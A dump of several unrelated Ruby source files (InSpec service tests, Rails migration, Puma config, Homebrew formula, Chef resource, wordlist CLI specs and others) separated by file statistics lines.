params = Hashie::Mash.new({ 'ActiveState' => 'active', 'Description' => 'OpenSSH server daemon', 'Id' => 'sshd.service', 'LoadState' => 'loaded', 'Names' => 'sshd.service', 'SubState' => 'running', 'UnitFileState' => 'enabled' })
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'sshd.service'
_(resource.description).must_equal 'OpenSSH server daemon'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# debian 8 with systemd but no service file
it 'gets the correct service info when the `.service` file is missing' do
resource = MockLoader.new(:debian8).load_resource('service', 'apache2')
params = Hashie::Mash.new(
'ActiveState' => 'active',
'Description' => 'LSB: Apache2 web server',
'Id' => 'apache2.service',
'LoadState' => 'loaded',
'Names' => 'apache2.service',
'SubState' => 'running',
'UnitFileState' => ''
)
_(resource.type).must_equal 'systemd'
_(resource.name).must_equal 'apache2.service'
_(resource.description).must_equal 'LSB: Apache2 web server'
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# macos test
it 'verify mac osx service parsing' do
resource = MockLoader.new(:osx104).load_resource('service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'darwin'
_(resource.name).must_equal 'org.openbsd.ssh-agent'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
it 'verify mac osx service parsing with not-running service' do
resource = MockLoader.new(:osx104).load_resource('service', 'FilesystemUI')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'darwin'
_(resource.name).must_equal 'com.apple.FilesystemUI'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal false
_(resource.params).must_equal params
end
it 'verify mac osx service parsing with default launchd_service' do
resource = MockLoader.new(:osx104).load_resource('launchd_service', 'ssh')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'darwin'
_(resource.name).must_equal 'org.openbsd.ssh-agent'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# wrlinux
it 'verify wrlinux service parsing' do
resource = MockLoader.new(:wrlinux).load_resource('service', 'sshd')
params = Hashie::Mash.new({})
_(resource.type).must_equal 'sysv'
_(resource.name).must_equal 'sshd'
_(resource.description).must_be_nil
_(resource.installed?).must_equal true
_(resource.enabled?).must_equal true
_(resource.running?).must_equal true
_(resource.params).must_equal params
end
# unknown OS
it 'verify service handling on unsupported os' do
resource = MockLoader.new(:undefined).load_resource('service', 'dhcp')
params = Hashie::Mash.new({})
_(resource.installed?).must_equal false
_(resource.description).must_be_nil
_(resource.params).must_equal params
end
# runlevel detection
describe 'runlevels on centos 6 (system V)' do
let(:service) { MockLoader.new(:centos6).load_resource('service', 'sshd') }
it 'grabs all runlevels' do
service.runlevels.keys.must_equal [0, 1, 2, 3, 4, 5, 6]
end
it 'grabs runlevels via filter nil' do
service.runlevels(nil).keys.must_equal [0, 1, 2, 3, 4, 5, 6]
end
it 'grabs runlevels by number' do
service.runlevels(3).keys.must_equal [3]
end
it 'grabs runlevels by multiple numbers' do
service.runlevels(3, 4, 8).keys.must_equal [3, 4]
end
it 'grabs runlevels via regex' do
service.runlevels(/[5-9]/).keys.must_equal [5, 6]
end
it 'checks enabled true if all services are enabled' do
service.runlevels(2, 4).enabled?.must_equal true
end
it 'checks enabled false if some services are not enabled' do
service.runlevels(1, 4).enabled?.must_equal false
end
it 'checks disabled true if all services are disabled' do
service.runlevels(0, 1).disabled?.must_equal true
end
it 'checks disabled false if some services are not disabled' do
service.runlevels(0, 4).enabled?.must_equal false
end
end
end
| 43.871179 | 233 | 0.702981 |
1ac1d1b7cb060e9c82a293feaa8fbd781548e351 | 275 | class CreateInvitations < ActiveRecord::Migration[5.2]
def change
create_table :invitations do |t|
t.integer :user_invita
t.integer :user_invitado
t.date :fecha
t.integer :local_id
t.boolean :confirma
t.timestamps
end
end
end
| 19.642857 | 54 | 0.661818 |
e82cc30b6b98651c69c510ff7835169719bdceb0 | 226 | require 'spec_helper_system'
describe 'basic tests' do
it 'class should work without errors' do
pp = <<-EOS
class { 'phpapc': }
EOS
puppet_apply(pp) do |r|
r.exit_code.should == 2
end
end
end
| 16.142857 | 42 | 0.615044 |
5d2d98c628975235e249622c59ba03d76e9e2d5e | 1,133 | module QuickSearch::OnCampus
extend ActiveSupport::Concern
private
# Search for "Nucleation and growth mechanism of ferroelectric domain wall motion"
# To test this. Result should not show up in Summon results off campus.
### WHY THIS IS HERE ###
# There is a subset of Summon results that cannot be shown unless a person is
# on campus or authenticated. So that we can show all results to people
# searching QuickSearch from on campus we're checking IP addresses. If the IP is a
# known campus IP we set the s.role=authenticated parameter in the Summon API request.
def ip
request.env['HTTP_X_FORWARDED_FOR'] || request.remote_ip
end
def on_campus?(ip)
ip = remote_ip(ip)
ip_range_check(ip)
end
# To spoof ON and OFF campus for development
def remote_ip(ip)
if ip == '127.0.0.1'
'204.84.244.1' #On Campus
#'127.0.0.1' #Off Campus
else
ip
end
end
def ip_range_check(ip)
QuickSearch::Engine::APP_CONFIG['on_campus'].each do |on_campus_ip_regex|
if on_campus_ip_regex === ip
return true
end
end
return false
end
end
| 25.75 | 88 | 0.690203 |
081c2e825d0feeffd13b4cde3048ebb363546088 | 882 | # Test coverage startup
if ENV['SIMPLECOV']
# Set the environment variable if you want to generate a detailed
# coverage report on your local box
require "simplecov"
SimpleCov.start
end
def stub_random_iv
before do
cipher = OpenSSL::Cipher.new(ClaimToken.configuration.cipher_type)
allow(cipher).to receive(:random_iv).and_return("\nK\x0F^1X\xE6\x8A'\xDBf\xB8\x93i\xA3\x9D")
allow(OpenSSL::Cipher).to receive(:new).and_return(cipher)
end
end
def use_test_configuration
before do
ClaimToken.configure do |config|
config.shared_encryption_key = "fba0d989f259ad36ada12c127356d420"
config.digest_secret = "d22b90c9172649eaf49cd185f73bd4a53ec3ff4dc6f7d51f9dbaac62421e6dd297b38efcd431a7f2"
end
end
after do
restore_default_config
end
end
def restore_default_config
ClaimToken.configuration = nil
ClaimToken.configure {}
end
| 25.941176 | 111 | 0.772109 |
bf8261feebd3c0ae1cef0bdd87ed1c32068415a4 | 1,314 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/private_catalog/v1beta1/private_catalog"
require "google/cloud/private_catalog/v1beta1/version"
module Google
module Cloud
module PrivateCatalog
##
# To load this package, including all its services, and instantiate a client:
#
# @example
#
# require "google/cloud/private_catalog/v1beta1"
# client = ::Google::Cloud::PrivateCatalog::V1beta1::PrivateCatalog::Client.new
#
module V1beta1
end
end
end
end
helper_path = ::File.join __dir__, "v1beta1", "_helpers.rb"
require "google/cloud/private_catalog/v1beta1/_helpers" if ::File.file? helper_path
| 32.04878 | 89 | 0.728311 |
ab29212ef4ee8778a44024e0fb40b6eedf2f3e40 | 762 | # Puma is a fast, concurrent web server for Ruby & Rack
#
# Learn more at: https://puma.io
#
port ENV.fetch("BRIDGETOWN_PORT") { 4000 }
# You can adjust the number of workers (separate processes) and threads
# (per process) based on your production system
#
if ENV["BRIDGETOWN_ENV"] == "production"
workers ENV.fetch("BRIDGETOWN_CONCURRENCY") { 4 }
end
max_threads_count = ENV.fetch("BRIDGETOWN_MAX_THREADS") { 5 }
min_threads_count = ENV.fetch("BRIDGETOWN_MIN_THREADS") { max_threads_count }
threads min_threads_count, max_threads_count
# Preload the application for maximum performance
#
preload_app!
# Use the Bridgetown logger format
#
require "bridgetown-core/rack/logger"
log_formatter do |msg|
Bridgetown::Rack::Logger.message_with_prefix msg
end
| 27.214286 | 77 | 0.769029 |
21244762bb53dd5595283d86e156a711cc72ea90 | 4,992 | # enabling the load of files from root (on RSpec)
$LOAD_PATH.unshift(File.dirname(__FILE__) + '/../')
require 'rubygems'
require 'spec'
require 'mocha'
require 'restclient'
require 'lib/waz-tables'
describe "Table object behavior" do
it "should initialize a new table" do
table = WAZ::Tables::Table.new({:name => 'tablename', :url => 'http://localhost' })
table.name.should == 'tablename'
table.url.should == 'http://localhost'
end
it "should list tables" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
result = [ {:name => 'table1', :url => 'url1'}, {:name => 'table2', :url => 'url2'} ], nil
WAZ::Tables::Service.any_instance.expects(:list_tables).returns(result)
tables = WAZ::Tables::Table.list
tables.size.should == 2
tables.first().name.should == "table1"
tables.first().url.should == "url1"
tables.last().name.should == "table2"
tables.last().url.should == "url2"
end
it "should find a table by its name and return a WAZ::Tables::Table instance" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:get_table).with('table1').returns({:name => 'table1', :url => 'url1'})
table = WAZ::Tables::Table.find('table1')
table.name.should == "table1"
table.url.should == "url1"
end
it "should return nil when looking for an unexisting table" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:get_table).with('unexistingtable').raises(WAZ::Tables::TableDoesNotExist.new('unexistingtable'))
table = WAZ::Tables::Table.find('unexistingtable')
table.nil?.should == true
end
it "should create table" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my-account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:create_table).returns({:name => 'table1', :url => 'http://foo'})
table = WAZ::Tables::Table.create('table1')
table.name.should == "table1"
end
it "should destroy a table" do
WAZ::Storage::Base.stubs(:default_connection).returns({:account_name => "my_account", :access_key => "key"})
WAZ::Tables::Service.any_instance.expects(:delete_table).with("tabletodelete")
WAZ::Tables::Service.any_instance.expects(:get_table).returns({:name => 'tabletodelete', :url => 'http://localhost'})
table = WAZ::Tables::Table.find('tabletodelete')
table.destroy!
end
it "should throw when not name provided for the table" do
lambda { WAZ::Tables::Table.new({:foo => "bar"}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when table name starts with no lower/upper char" do
lambda { WAZ::Tables::Table.create('9table') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when table contains any other char than letters or digits" do
lambda { WAZ::Tables::Table.create('table-name') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when table name is less than 3" do
lambda { WAZ::Tables::Table.create('t') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when table name is longer than 63" do
lambda { WAZ::Tables::Table.create('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa') }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
it "should raise an exception when :url option is not provided" do
lambda { WAZ::Tables::Table.new({:name => 'name'}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when :name option is not provided" do
lambda { WAZ::Tables::Table.new({:url => 'url'}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when :name is empty" do
lambda { WAZ::Tables::Table.new({:name => '', :url => 'url'}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when :url is empty" do
lambda { WAZ::Tables::Table.new({:name => 'name', :url => ''}) }.should raise_error(WAZ::Storage::InvalidOption)
end
it "should raise an exception when invalid table name is provided" do
INVALID_TABLE_ERROR_MESSAGE = "must start with at least one lower/upper characted, can have character or any digit starting from the second position, must be from 3 through 63 characters long"
options = {:name => '1invalidname', :url => 'url'}
options.stubs(:keys).returns([:name, :url])
WAZ::Tables::Table.any_instance.stubs(:new).with(options).raises(WAZ::Storage::InvalidParameterValue)
lambda { WAZ::Tables::Table.new(options) }.should raise_error(WAZ::Storage::InvalidParameterValue)
end
end | 48.941176 | 196 | 0.689303 |
035f44d10206d570627221494963f4d294e62e9b | 74 |
class TopTwo < Top
def initialize
puts 'Depends on Top'
end
end
| 9.25 | 25 | 0.662162 |
e92ab80ddcd5e56cfc4f1b41305c6e6dcee6fd8e | 114 | class AddAboutToUser < ActiveRecord::Migration[5.1]
def change
add_column :users, :about, :string
end
end
| 19 | 51 | 0.72807 |
bba3093ebbd4628317928c0ec13d9b368f7f0e71 | 365 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::CDN::Mgmt::V2020_04_15
module Models
#
# Defines values for MinimumTlsVersion
#
module MinimumTlsVersion
None = "None"
TLS10 = "TLS10"
TLS12 = "TLS12"
end
end
end
| 21.470588 | 70 | 0.676712 |
876172bd9acc9569340ea3b149510662f85838f5 | 1,458 | class Allegro < Formula
desc "C/C++ multimedia library for cross-platform game development"
homepage "https://liballeg.org/"
url "https://github.com/liballeg/allegro5/releases/download/5.2.6.0/allegro-5.2.6.0.tar.gz"
sha256 "5de8189ec051e1865f359654f86ec68e2a12a94edd00ad06d1106caa5ff27763"
head "https://github.com/liballeg/allegro5.git"
bottle do
cellar :any
sha256 "9e71511f6c8faa8449dd06bc30bd74497ee832e3e0ca7f3eb02bcef263ab4b3f" => :catalina
sha256 "ead9f69a2af4720ad8a9e020657b1db71e49cb3e83d9d8477d425de9d948ce07" => :mojave
sha256 "4ab4367b267e257a1aeee6cd65301922cf38cb37e8c11865edecedac5960f96e" => :high_sierra
end
depends_on "cmake" => :build
depends_on "dumb"
depends_on "flac"
depends_on "freetype"
depends_on "libogg"
depends_on "libvorbis"
depends_on "opusfile"
depends_on "physfs"
depends_on "theora"
depends_on "webp"
def install
mkdir "build" do
system "cmake", "..", *std_cmake_args, "-DWANT_DOCS=OFF"
system "make", "install"
end
end
test do
(testpath/"allegro_test.cpp").write <<~EOS
#include <assert.h>
#include <allegro5/allegro5.h>
int main(int n, char** c) {
if (!al_init()) {
return 1;
}
return 0;
}
EOS
system ENV.cxx, "-I#{include}", "-L#{lib}", "-lallegro", "-lallegro_main",
"-o", "allegro_test", "allegro_test.cpp"
system "./allegro_test"
end
end
| 28.588235 | 93 | 0.679012 |
796860a5315bbbe00b2db2bda41bde77f04b036a | 5,241 | #
# Copyright:: Copyright (c) Chef Software Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Chef
class Resource
class ChocolateySource < Chef::Resource
unified_mode true
provides :chocolatey_source
description "Use the **chocolatey_source** resource to add, remove, enable, or disable Chocolatey sources."
introduced "14.3"
examples <<~DOC
**Add a Chocolatey source**
```ruby
chocolatey_source 'MySource' do
source 'http://example.com/something'
action :add
end
```
**Remove a Chocolatey source**
```ruby
chocolatey_source 'MySource' do
action :remove
end
```
DOC
property :source_name, String, name_property: true,
description: "An optional property to set the source name if it differs from the resource block's name."
property :source, String,
description: "The source URL."
property :bypass_proxy, [TrueClass, FalseClass], default: false,
description: "Whether or not to bypass the system's proxy settings to access the source."
property :admin_only, [TrueClass, FalseClass], default: false,
description: "Whether or not to set the source to be accessible to only admins.",
introduced: "15.1"
property :allow_self_service, [TrueClass, FalseClass], default: false,
description: "Whether or not to set the source to be used for self service.",
introduced: "15.1"
property :priority, Integer, default: 0,
description: "The priority level of the source."
property :disabled, [TrueClass, FalseClass], default: false, desired_state: false, skip_docs: true
load_current_value do
element = fetch_source_element(source_name)
current_value_does_not_exist! if element.nil?
source_name element["id"]
source element["value"]
bypass_proxy element["bypassProxy"] == "true"
admin_only element["adminOnly"] == "true"
allow_self_service element["selfService"] == "true"
priority element["priority"].to_i
disabled element["disabled"] == "true"
end
# @param [String] id the source name
# @return [REXML::Attributes] finds the source element with the
def fetch_source_element(id)
require "rexml/document" unless defined?(REXML::Document)
config_file = "#{ENV["ALLUSERSPROFILE"]}\\chocolatey\\config\\chocolatey.config"
raise "Could not find the Chocolatey config at #{config_file}!" unless ::File.exist?(config_file)
config_contents = REXML::Document.new(::File.read(config_file))
data = REXML::XPath.first(config_contents, "//sources/source[@id=\"#{id}\"]")
data ? data.attributes : nil # REXML just returns nil if it can't find anything so avoid an undefined method error
end
action :add, description: "Adds a Chocolatey source" do
raise "#{new_resource}: When adding a Chocolatey source you must pass the 'source' property!" unless new_resource.source
converge_if_changed do
shell_out!(choco_cmd("add"))
end
end
action :remove, description: "Removes a Chocolatey source" do
if current_resource
converge_by("remove Chocolatey source '#{new_resource.source_name}'") do
shell_out!(choco_cmd("remove"))
end
end
end
action :disable, description: "Disables a Chocolatey source." do
if current_resource.disabled != true
converge_by("disable Chocolatey source '#{new_resource.source_name}'") do
shell_out!(choco_cmd("disable"))
end
end
end
action :enable, description: "Enables a Chocolatey source." do
if current_resource.disabled == true
converge_by("enable Chocolatey source '#{new_resource.source_name}'") do
shell_out!(choco_cmd("enable"))
end
end
end
action_class do
# @param [String] action the name of the action to perform
# @return [String] the choco source command string
def choco_cmd(action)
cmd = "#{ENV["ALLUSERSPROFILE"]}\\chocolatey\\bin\\choco source #{action} -n \"#{new_resource.source_name}\""
if action == "add"
cmd << " -s #{new_resource.source} --priority=#{new_resource.priority}"
cmd << " --bypassproxy" if new_resource.bypass_proxy
cmd << " --allowselfservice" if new_resource.allow_self_service
cmd << " --adminonly" if new_resource.admin_only
end
cmd
end
end
end
end
end
| 36.65035 | 128 | 0.643007 |
016871fe83fd24078cb1254be625b641fe91eb81 | 2,555 | require 'logger'
require 'rest_client'
require 'multi_json'
require 'time'
require 'date'
require 'zlib'
class BackdropReporter
def initialize(aggregated_dir, posted_dir, options = {})
@aggregated_dir = aggregated_dir
@posted_dir = posted_dir
@logger = options[:logger] || Logger.new(nil)
@backdrop_endpoint = options[:backdrop_endpoint] || raise("must specify backdrop endpoint")
@bearer_token = options[:bearer_token]
@timeout = options[:timeout] || 10
@open_timeout = options[:open_timeout] || 10
@sub_batch_size = 1000
end
def payload_batches
Enumerator.new do |yielder|
Dir[File.join(@aggregated_dir, "[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9].txt.gz")].reject do |path|
already_posted?(path)
end.map do |path|
file_date = File.basename(path, '.txt.gz')
data_batch = Zlib::GzipReader.open(path).map do |line|
count, url = line.strip.split("\t")
{
_id: "#{file_date}-#{url}",
_timestamp: DateTime.parse("#{file_date} 00:00:00 +00:00").iso8601,
url: url,
count: count
}
end
yielder << [file_date, data_batch]
end
end
end
def report!
@logger.info "Posting to #{@backdrop_endpoint}"
payload_batches.each do |file_date, batch|
begin
@logger.info "Posting #{batch.size} items for #{file_date}.."
headers = {
content_type: :json,
accept: :json
}
headers.merge!(authorization: "Bearer #{@bearer_token}") if @bearer_token
batch.each_slice(@sub_batch_size).with_index do |sub_batch, i|
from = i * @sub_batch_size
to = (i + 1) * @sub_batch_size - 1
@logger.info "Posting #{from}-#{to} of #{batch.size} items for #{file_date}.."
RestClient::Request.execute(
method: :post,
url: @backdrop_endpoint,
payload: MultiJson.dump(sub_batch),
headers: headers,
timeout: @timeout,
open_timeout: @open_timeout)
end
FileUtils.touch(File.join(@posted_dir, "#{file_date}.txt.gz"))
@logger.info ".. OK"
rescue RestClient::Exception => e
@logger.error "FAILED to post #{file_date} because #{e}"
@logger.error e.response
end
end
end
def already_posted?(aggregate_file)
posting_file = File.join(@posted_dir, File.basename(aggregate_file))
File.exist?(posting_file) && (File.mtime(posting_file) >= File.mtime(aggregate_file))
end
end | 33.618421 | 107 | 0.607828 |
ff599b6a01d6c84b0aeed1ddb155bb6612e8b1ef | 214 | module WoodShop
class Filter < ApplicationRecord
has_many :filter_values, dependent: :destroy
has_many :products, through: :filter_values
has_many :sub_products, through: :filter_values
end
end
| 26.75 | 51 | 0.752336 |
ab3d63a01945f75a487efc2a7e35c8de6fb103c5 | 1,566 | # -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'aliyun/version'
Gem::Specification.new do |spec|
spec.name = 'aliyun-sdk'
spec.version = Aliyun::VERSION
spec.authors = ['Tianlong Wu']
spec.email = ['[email protected]']
spec.summary = 'Aliyun OSS SDK for Ruby'
spec.description = 'A Ruby program to facilitate accessing Aliyun Object Storage Service'
spec.homepage = 'https://github.com/aliyun/aliyun-oss-ruby-sdk'
spec.files = Dir.glob("lib/**/*.rb") + Dir.glob("examples/**/*.rb") + Dir.glob("ext/**/*.{rb,c,h}")
spec.test_files = Dir.glob("spec/**/*_spec.rb") + Dir.glob("tests/**/*.rb")
spec.extra_rdoc_files = ['README.md', 'CHANGELOG.md']
spec.bindir = 'lib/aliyun'
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.license = 'MIT'
spec.extensions = ['ext/crcx/extconf.rb']
spec.add_dependency 'nokogiri', '~> 1.6', "< 1.7.0"
spec.add_dependency 'rest-client', '~> 2.0.2'
spec.add_development_dependency 'bundler', '~> 1.10'
spec.add_development_dependency 'rake', '~> 10.4'
spec.add_development_dependency 'rake-compiler', '~> 0.9.0'
spec.add_development_dependency 'rspec', '~> 3.3'
spec.add_development_dependency 'webmock', '~> 3.0'
spec.add_development_dependency 'simplecov', '~> 0.10.0'
spec.add_development_dependency 'minitest', '~> 5.8'
spec.required_ruby_version = '>= 1.9.3'
end
| 39.15 | 109 | 0.64304 |
bbb3d44619eb1a1999ba2eda33b9fc81eaf95f1d | 24,718 | require 'spec_helper'
require 'wordlist/cli'
describe Wordlist::CLI do
describe "#initialize" do
it "must default #mode to :read" do
expect(subject.mode).to eq(:read)
end
it "must default #format to nil" do
expect(subject.format).to be(nil)
end
it "must default #command to nil" do
expect(subject.command).to be(nil)
end
it "must default #output to nil" do
expect(subject.output).to be(nil)
end
it "must initialize #option_parser" do
expect(subject.option_parser).to be_kind_of(OptionParser)
end
it "must initialize #operators to []" do
expect(subject.operators).to eq([])
end
it "must initialize #modifiers to []" do
expect(subject.modifiers).to eq([])
end
it "must initialize #build_options to {}" do
expect(subject.builder_options).to eq({})
end
end
describe "#print_error" do
let(:error) { "error!" }
it "must print the program name and the error message to stderr" do
expect {
subject.print_error(error)
}.to output("#{described_class::PROGRAM_NAME}: #{error}#{$/}").to_stderr
end
end
describe "#print_backtrace" do
let(:exception) { RuntimeError.new("error!") }
it "must print the program name and the error message to stderr" do
expect {
subject.print_backtrace(exception)
}.to output(
%r{Oops! Looks like you've found a bug!
Please report the following text to: #{Regexp.escape(described_class::BUG_REPORT_URL)}
```}m
).to_stderr
end
end
let(:fixtures_dir) { File.join(__dir__,'fixtures') }
describe "#open_wordlist" do
context "when #format is set" do
let(:format) { :gzip }
let(:path) { ::File.join(fixtures_dir,'wordlist_with_ambiguous_format') }
subject { described_class.new(format: format) }
it "must call Wordlist::File.new with a format: keyword argument" do
wordlist = subject.open_wordlist(path)
expect(wordlist.format).to be(format)
end
end
context "when #format is not set" do
let(:path) { ::File.join(fixtures_dir,'wordlist.txt.gz') }
it "must let Wordlist::File.new infer the format" do
wordlist = subject.open_wordlist(path)
expect(wordlist.format).to be(:gzip)
end
context "and the file's format cannot be inferred" do
let(:path) { ::File.join(fixtures_dir,'wordlist_with_ambiguous_format') }
it "must print an error and exit with -1" do
expect(subject).to receive(:exit).with(-1)
expect {
subject.open_wordlist(path)
}.to output("#{described_class::PROGRAM_NAME}: could not infer the format of file: #{path.inspect}#{$/}").to_stderr
end
end
end
context "when the file does not exist" do
let(:path) { 'does/not/exist.txt' }
let(:absolute_path) { File.expand_path(path) }
it "must print an error and exit with -1" do
expect(subject).to receive(:exit).with(-1)
expect {
subject.open_wordlist(path)
}.to output("#{described_class::PROGRAM_NAME}: wordlist file does not exist: #{absolute_path.inspect}#{$/}").to_stderr
end
end
end
describe "#add_operator" do
let(:op1) { :+ }
let(:wordlist1) { double(:other_wordlist1) }
let(:op2) { :* }
let(:wordlist2) { double(:other_wordlist2) }
before do
subject.add_operator(op1, wordlist1)
subject.add_operator(op2, wordlist2)
end
it "must append an operator and it's arguments to #operators" do
expect(subject.operators[0]).to be_a(Array)
expect(subject.operators[0][0]).to eq(op1)
expect(subject.operators[0][1]).to eq([wordlist1])
expect(subject.operators[1]).to be_a(Array)
expect(subject.operators[1][0]).to eq(op2)
expect(subject.operators[1][1]).to eq([wordlist2])
end
end
describe "#add_modifier" do
let(:mod1) { :capitalize }
let(:args1) { [] }
let(:mod2) { :gsub }
let(:args2) { ['e','3'] }
before do
subject.add_modifier(mod1, *args1)
subject.add_modifier(mod2, *args2)
end
it "must append an modifier and it's arguments to #modifiers" do
expect(subject.modifiers[0]).to be_a(Array)
expect(subject.modifiers[0][0]).to eq(mod1)
expect(subject.modifiers[0][1]).to eq(args1)
expect(subject.modifiers[1]).to be_a(Array)
expect(subject.modifiers[1][0]).to eq(mod2)
expect(subject.modifiers[1][1]).to eq(args2)
end
end
describe "#option_parser" do
it do
expect(subject.option_parser).to be_kind_of(OptionParser)
end
describe "#parse" do
context "when given -f FORMAT" do
let(:format) { :gzip }
let(:argv) { ['-f', format.to_s] }
before { subject.option_parser.parse(argv) }
it "must set #format" do
expect(subject.format).to eq(format)
end
end
context "when given --format FORMAT" do
let(:format) { :gzip }
let(:argv) { ['--format', format.to_s] }
before { subject.option_parser.parse(argv) }
it "must set #format" do
expect(subject.format).to eq(format)
end
end
context "when given --exec COMMAND" do
let(:command) { "foo {}" }
let(:argv) { ['--exec', command] }
before { subject.option_parser.parse(argv) }
it "must set #command" do
expect(subject.command).to eq(command)
end
end
%w[-U --union].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:|)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-I --intersect].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:&)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-S --subtract].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:-)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-p --product].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:*)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be_kind_of(Wordlist::File)
expect(subject.operators[0][1][0].path).to eq(wordlist)
end
end
end
%w[-P --power].each do |flag|
context "when given #{flag} POWER" do
let(:power) { 3 }
let(:argv) { [flag, power.to_s] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:**)
expect(subject.operators[0][1].length).to be(1)
expect(subject.operators[0][1][0]).to be(power)
end
end
end
%w[-u --unique].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must append to #operators" do
expect(subject.operators.length).to be(1)
expect(subject.operators[0][0]).to be(:uniq)
expect(subject.operators[0][1].length).to be(0)
end
end
end
%w[-C --capitalize].each do |flag|
context "when given #{flag}" do
let(:argv) { [flag] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:capitalize)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
%w[--uppercase --upcase].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:upcase)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
%w[--lowercase --downcase].each do |flag|
context "when given #{flag} WORDLIST" do
let(:wordlist) { File.join(fixtures_dir,'wordlist.txt.gz') }
let(:argv) { [flag, wordlist] }
before { subject.option_parser.parse(argv) }
it "must append to #modifiers" do
expect(subject.modifiers.length).to be(1)
expect(subject.modifiers[0][0]).to be(:downcase)
expect(subject.modifiers[0][1].length).to be(0)
end
end
end
